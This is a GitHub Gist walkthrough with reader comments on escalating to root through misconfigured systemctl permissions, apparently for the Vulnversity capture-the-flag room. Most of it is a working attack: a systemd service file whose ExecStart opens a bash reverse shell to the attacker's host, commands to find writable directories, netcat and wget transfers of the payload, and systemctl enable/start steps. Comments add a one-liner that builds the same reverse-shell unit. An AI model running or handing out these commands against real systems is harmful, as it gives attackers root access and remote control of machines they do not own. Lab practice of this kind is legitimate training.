Skip to content

Instantly share code, notes, and snippets.

@A1vinSmith
Last active October 8, 2024 21:27
Show Gist options
  • Save A1vinSmith/78786df7899a840ec43c5ddecb6a4740 to your computer and use it in GitHub Desktop.
Save A1vinSmith/78786df7899a840ec43c5ddecb6a4740 to your computer and use it in GitHub Desktop.
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

For better reading experience

https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find a files/directories that writable

find / -type f -maxdepth 2 -writable

or

find / -type d -maxdepth 2 -writable

2. Transfter the payload(Or just write file there using vi)

Init the target listening the port
nc -vl 44444 > root.service
Send file to traget
nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root

5. The nc listening on 9999 would give you the root

Appreicaite for following or star on my GitHub

Cheers

Expand Knowlege

https://gtfobins.github.io/gtfobins/systemctl/#suid

https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory

https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

@carlvaneijk
Copy link

froget about all that file transferring

START LISTENER (9999)

find / -type d -maxdepth 2 -writable

-CD to writable dir-

-One liner -
RATME="'bash -i >& /dev/tcp/yourIPHere/9999 0>&1'" echo '[Unit]\nDescription=rooted-Oneliner\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c '$RATME'\n\n[Install]\nWantedBy=multi-user.target' >root.service

-Start-
/bin/systemctl enable /whatever-writable-dir/root.service
/bin/systemctl start root

@adibdz
Copy link

adibdz commented Sep 9, 2021

Just finished thm-vulnversity. I just found out that nc can transfer file. Before, I write the payload manually on victim machine with very slowly and patienly.

@hoangquandn97
Copy link

Who is here for the vulnervisity room?

@rochellelewis
Copy link

Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then wget it in the reverse shell you already got.


Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell, and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)

Voila!

@17Chad
Copy link

17Chad commented Oct 7, 2022

The man, ty

@amine-niouar
Copy link

it works , ty

@A1vinSmith
Copy link
Author

@exp1007
Copy link

exp1007 commented Jun 1, 2024

vulnervisity room, if you already have an open shell, just use the same ip and port for root.service as your shell, and just reconnect.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment